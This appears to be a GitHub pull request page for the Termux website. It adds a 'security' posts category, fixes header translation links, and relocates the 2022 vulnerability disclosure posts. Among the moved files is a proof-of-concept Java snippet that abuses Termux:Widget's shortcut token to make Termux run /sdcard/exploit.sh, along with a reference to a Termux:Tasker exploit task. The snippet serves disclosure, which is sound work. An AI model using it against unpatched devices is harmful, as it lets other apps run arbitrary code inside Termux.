这是indexloc提供的服务,不要输入任何密码
Skip to content

Add dedicated Security posts category and Security Incident Response Checklist page #160

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Merged
merged 4 commits into from
Jul 1, 2025
Merged

Add dedicated Security posts category and Security Incident Response Checklist page #160

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
4 commits
Select commit Hold shift + click to select a range
af6a89a
Fixed: Fixed space getting trimmed before posts count for category
agnostic-apollo Jun 26, 2025
87e5fec
Fixed: Do not use site language for default header link names as tran…
agnostic-apollo Jun 26, 2025
c23bfd8
Added|Changed(posts): Add dedicated `security` posts category and mov…
agnostic-apollo Jun 26, 2025
0e76c09
Added: Add Security Incident Response Checklist page for info on the …
agnostic-apollo Jun 26, 2025
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
7 changes: 7 additions & 0 deletions _config.yml
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -48,6 +48,7 @@ collections:
feed:
categories:
- general
- security

show_excerpts: true # set to true to show excerpts on posts

Expand Down Expand Up @@ -102,6 +103,12 @@ defaults:
values:
category: packages

-
scope:
path: "_posts/*/security"
values:
category: security


# Set page.lang for all posts files under respective languages and permalink with /en/:collection prefix
-
Expand Down
2 changes: 2 additions & 0 deletions _data/posts/t/cn/views.yml
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -3,7 +3,9 @@ index:
apps: 应用
general: 常规
packages: 包
security: 安全
apps_posts: 关于应用的文章
general_posts: 常规文章
packages_posts: 关于软件包的文章
security_posts: 安全类文章
subscribe_to_rss_feed: 订阅RSS源
2 changes: 2 additions & 0 deletions _data/posts/t/en/views.yml
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -3,7 +3,9 @@ index:
apps: Apps
general: General
packages: Packages
security: Security
apps_posts: Apps Posts
general_posts: General Posts
packages_posts: Packages Posts
security_posts: Security Posts
subscribe_to_rss_feed: Subscribe to RSS feed
2 changes: 2 additions & 0 deletions _data/sitemap.yml
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -2,4 +2,6 @@ excludes:
- /redirects.json
- /feed.xml
- /general/2022/02/15/termux-apps-vulnerability-disclosures.html
- /en/posts/general/2022/02/15/termux-apps-vulnerability-disclosures.html
- /cn/posts/general/2022/02/15/termux-apps-vulnerability-disclosures.html
- /apps/2022/02/25/termux-tasker-v0.6.0-release.html
1 change: 1 addition & 0 deletions _data/t/cn/views/navigation.yml
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -4,6 +4,7 @@ docs: 文档
posts: 文章
packages: 软件包
donate: 捐赠
security: 安全
privacy_policy: 隐私政策

# Footer
Expand Down
10 changes: 5 additions & 5 deletions _includes/header.html
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -23,15 +23,15 @@
{%- if file_exists.size != 0 -%}
<a class="page-link" href="/{{- page.lang -}}/docs/index.html">{%- include t.html key="views.navigation.docs" -%}</a>
{%- else -%}
<a class="page-link" href="/{{- site.lang -}}/docs/index.html">{%- include t.html key="views.navigation.docs" lang=site.lang -%}</a>
<a class="page-link" href="/{{- site.lang -}}/docs/index.html">{%- include t.html key="views.navigation.docs" -%}</a>
{%- endif -%}

{%- assign path = page.lang | append: "/posts/index.md" -%}
{%- assign file_exists = site.html_pages | where: "path", path -%}
{%- if file_exists.size != 0 -%}
<a class="page-link" href="/{{- page.lang -}}/posts/index.html">{%- include t.html key="views.navigation.posts" -%}</a>
{%- else -%}
<a class="page-link" href="/{{- site.lang -}}/posts/index.html">{%- include t.html key="views.navigation.posts" lang=site.lang -%}</a>
<a class="page-link" href="/{{- site.lang -}}/posts/index.html">{%- include t.html key="views.navigation.posts" -%}</a>
{%- endif -%}

<a class="page-link" href="https://packages.termux.dev">{%- include t.html key="views.navigation.packages" -%}</a>
Expand All @@ -41,23 +41,23 @@
{%- if file_exists.size != 0 -%}
<a class="page-link" href="/{{- page.lang -}}/donate">{%- include t.html key="views.navigation.donate" -%}</a>
{%- else -%}
<a class="page-link" href="/{{- site.lang -}}/donate">{%- include t.html key="views.navigation.donate" lang=site.lang -%}</a>
<a class="page-link" href="/{{- site.lang -}}/donate">{%- include t.html key="views.navigation.donate" -%}</a>
{%- endif -%}

{%- assign path = page.lang | append: "/security.md" -%}
{%- assign file_exists = site.html_pages | where: "path", path -%}
{%- if file_exists.size != 0 -%}
<a class="page-link" href="/{{- page.lang -}}/security">{%- include t.html key="views.navigation.security" -%}</a>
{%- else -%}
<a class="page-link" href="/{{- site.lang -}}/security">{%- include t.html key="views.navigation.security" lang=site.lang -%}</a>
<a class="page-link" href="/{{- site.lang -}}/security">{%- include t.html key="views.navigation.security" -%}</a>
{%- endif -%}

{%- assign path = page.lang | append: "/privacy-policy.md" -%}
{%- assign file_exists = site.html_pages | where: "path", path -%}
{%- if file_exists.size != 0 -%}
<a class="page-link" href="/{{- page.lang -}}/privacy-policy">{%- include t.html key="views.navigation.privacy_policy" -%}</a>
{%- else -%}
<a class="page-link" href="/{{- site.lang -}}/privacy-policy">{%- include t.html key="views.navigation.privacy_policy" lang=site.lang -%}</a>
<a class="page-link" href="/{{- site.lang -}}/privacy-policy">{%- include t.html key="views.navigation.privacy_policy" -%}</a>
{%- endif -%}

{%- if page.page_ref and page.lang -%}
Expand Down
2 changes: 1 addition & 1 deletion _includes/posts/category.html
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -3,7 +3,7 @@

{%- assign category_posts = site.categories[page.category_name] | where: "lang", page.lang -%}
{%- assign category_translate_key = "views.index." | append: page.category_name | append: "_posts" -%}
<h1 class="page-heading">{%- include t.html root="posts" key=category_translate_key -%} ({{- category_posts.size | default: "0" -}})</h1>
<h1 class="page-heading">{%- include t.html root="posts" key=category_translate_key %} ({{- category_posts.size | default: "0" -}})</h1>

{%- if category_posts.size > 0 -%}
<ul class="post-list">
Expand Down
1 change: 1 addition & 0 deletions _layouts/posts/index.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -7,6 +7,7 @@ layout: page
- [{%- include t.html root="posts" key="views.index.general" -%}](/{{- page.lang -}}/posts/general.html)
- [{%- include t.html root="posts" key="views.index.apps" -%}](/{{- page.lang -}}/posts/apps.html)
- [{%- include t.html root="posts" key="views.index.packages" -%}](/{{- page.lang -}}/posts/packages.html)
- [{%- include t.html root="posts" key="views.index.security" -%}](/{{- page.lang -}}/posts/security.html)

[{%- include t.html root="posts" key="views.index.subscribe_to_rss_feed" -%}](/feed.xml).

Expand Down
2 changes: 1 addition & 1 deletion _posts/cn/apps/2022-02-25-termux-tasker-v0.6.0-release.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -5,7 +5,7 @@ page_ref: /posts/apps/2022/02/25/termux-tasker-v0.6.0-release.html

`Termux:Tasker` `v0.6.0` 版本已经发布。

**强烈建议您更新到 `v0.5.0` 或更高版本以修复 [Termux 应用程序漏洞披露](https://termux.github.io/general/2022/02/15/termux-apps-vulnerability-disclosures.html) 。**
**强烈建议您更新到 `v0.5.0` 或更高版本以修复 [Termux 应用程序漏洞披露](https://termux.github.io/cn/posts/security/2022/02/15/termux-apps-vulnerability-disclosures.html) 。**
##


Expand Down
14 changes: 8 additions & 6 deletions ...-termux-apps-vulnerability-disclosures.md → ...-termux-apps-vulnerability-disclosures.md
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -1,6 +1,8 @@
---
title: "Termux应用程序漏洞披露"
page_ref: /posts/general/2022/02/15/termux-apps-vulnerability-disclosures.html
redirect_from:
- /cn/posts/general/2022/02/15/termux-apps-vulnerability-disclosures.html
page_ref: /posts/security/2022/02/15/termux-apps-vulnerability-disclosures.html
---

这是 `termux-app`、`termux-tasker` 和 `termux-widget` 的漏洞报告。
Expand Down Expand Up @@ -86,11 +88,11 @@ context.sendBroadcast(intent);
或者从任何一个应用程序,执行以下 Java 代码:

```java
Intent intent = new Intent();
intent.setClassName("com.termux.widget", "com.termux.widget.TermuxLaunchShortcutActivity");
intent.setData(Uri.parse("/sdcard/exploit.sh"));
intent.putExtra("com.termux.shortcut.token", "22e30b81-5d67-4ee3-be0e-66169f637025");
startActivity(intent);
Intent intent = new Intent();
intent.setClassName("com.termux.widget", "com.termux.widget.TermuxLaunchShortcutActivity");
intent.setData(Uri.parse("/sdcard/exploit.sh"));
intent.putExtra("com.termux.shortcut.token", "22e30b81-5d67-4ee3-be0e-66169f637025");
startActivity(intent);
```

Termux 应用程序将会执行使用 `/data/data/com.termux/files/usr/bin/sh` 执行 `/sdcard/exploit.sh` 脚本,`/sdcard` 被挂载为 `noexec` 也没有问题。
Expand Down
2 changes: 1 addition & 1 deletion _posts/en/apps/2022-02-25-termux-tasker-v0.6.0-release.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -6,7 +6,7 @@ page_ref: /posts/apps/2022/02/25/termux-tasker-v0.6.0-release.html

The `Termux:Tasker` `v0.6.0` is out.

**It is highly recommended that you update to `v0.5.0` or higher for fixes for vulnerabilities disclosed in the [Termux Apps Vulnerability Disclosures](https://termux.github.io/general/2022/02/15/termux-apps-vulnerability-disclosures.html) post.**
**It is highly recommended that you update to `v0.5.0` or higher for fixes for vulnerabilities disclosed in the [Termux Apps Vulnerability Disclosures](https://termux.github.io/en/posts/security/2022/02/15/termux-apps-vulnerability-disclosures.html) post.**
##


Expand Down
16 changes: 9 additions & 7 deletions ...-termux-apps-vulnerability-disclosures.md → ...-termux-apps-vulnerability-disclosures.md
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -1,7 +1,9 @@
---
title: "Termux Apps Vulnerability Disclosures"
redirect_from: /general/2022/02/15/termux-apps-vulnerability-disclosures.html
page_ref: /posts/general/2022/02/15/termux-apps-vulnerability-disclosures.html
redirect_from:
- /general/2022/02/15/termux-apps-vulnerability-disclosures.html
- /en/posts/general/2022/02/15/termux-apps-vulnerability-disclosures.html
page_ref: /posts/security/2022/02/15/termux-apps-vulnerability-disclosures.html
---

This is a vulnerability report for `termux-app`, `termux-tasker` and `termux-widget`.
Expand Down Expand Up @@ -88,11 +90,11 @@ The `Termux:Widget` "security" worked by [generating a token](https://github.com
Or use java from any app.

```java
Intent intent = new Intent();
intent.setClassName("com.termux.widget", "com.termux.widget.TermuxLaunchShortcutActivity");
intent.setData(Uri.parse("/sdcard/exploit.sh"));
intent.putExtra("com.termux.shortcut.token", "22e30b81-5d67-4ee3-be0e-66169f637025");
startActivity(intent);
Intent intent = new Intent();
intent.setClassName("com.termux.widget", "com.termux.widget.TermuxLaunchShortcutActivity");
intent.setData(Uri.parse("/sdcard/exploit.sh"));
intent.putExtra("com.termux.shortcut.token", "22e30b81-5d67-4ee3-be0e-66169f637025");
startActivity(intent);
```

The termux app will run the `/sdcard/exploit.sh` script with `/data/data/com.termux/files/usr/bin/sh` and `/sdcard` being mounted as `noexec` would not be an issue.
Expand Down
2 changes: 1 addition & 1 deletion ...ls/general/2022-02-15-termux-apps-vulnerability-disclosures/Termux_Tasker_Exploit.tsk.xml
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -7,7 +7,7 @@
<pri>100</pri>
<Action sr="act0" ve="7">
<code>300</code>
<label>Termux:Tasker exploit task as detailed in https:termux.github.io/general/2022/02/15/termux-apps-vulnerability-disclosures.html#1-termux-tasker-privilege-escalation-vulnerability.
<label>Termux:Tasker exploit task as detailed in https://termux.github.io/en/posts/security/2022/02/15/termux-apps-vulnerability-disclosures.html#termuxtasker-privilege-escalation-vulnerability.

Sample java code:
```
Expand Down
10 changes: 10 additions & 0 deletions cn/posts/security.html
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,10 @@
---
layout: page
title: 安全类文章
no_add_title_heading: true
category_name: security
page_ref: /posts/security.html
lang: cn
---

{% include posts/category.html %}
9 changes: 9 additions & 0 deletions en/posts/security.html
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,9 @@
---
layout: page
title: Security Posts
no_add_title_heading: true
category_name: security
page_ref: /posts/security.html
---

{% include posts/category.html %}
Loading
Loading